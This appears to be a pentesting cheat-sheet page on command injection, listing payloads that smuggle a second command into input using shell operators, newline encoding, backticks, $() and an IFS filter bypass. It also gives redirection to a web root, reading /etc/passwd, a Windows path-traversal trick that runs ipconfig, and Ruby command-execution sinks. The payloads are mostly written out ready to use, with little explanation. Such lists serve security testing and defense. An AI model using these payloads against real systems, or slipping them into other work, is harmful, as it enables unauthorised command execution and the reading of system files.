Link to this headingCommand Injection

Link to this headingPayloads

Example Payload:

#Both Unix and Windows supported ls||id; ls ||id; ls|| id; ls || id # Execute both ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe) ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º ls %0A id # %0A Execute both (RECOMMENDED) #Only unix supported `ls` # `` $(ls) # $() ls; id # ; Chain commands ls${LS_COLORS:10:1}${IFS}id # Might be useful #Not executed but may be interesting > /var/www/html/out.txt #Try to redirect the output to a file < /etc/passwd #Try to send some input to the command

Link to this headingWindows Command Injection

Source

cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/ipconfig.exe"

Link to this headingLanguage Dependent

Ruby on Rails:

eval("ruby code here") system("os command here") `ls -al /` # (backticks contain os command) exec("os command here") open("\| os command here")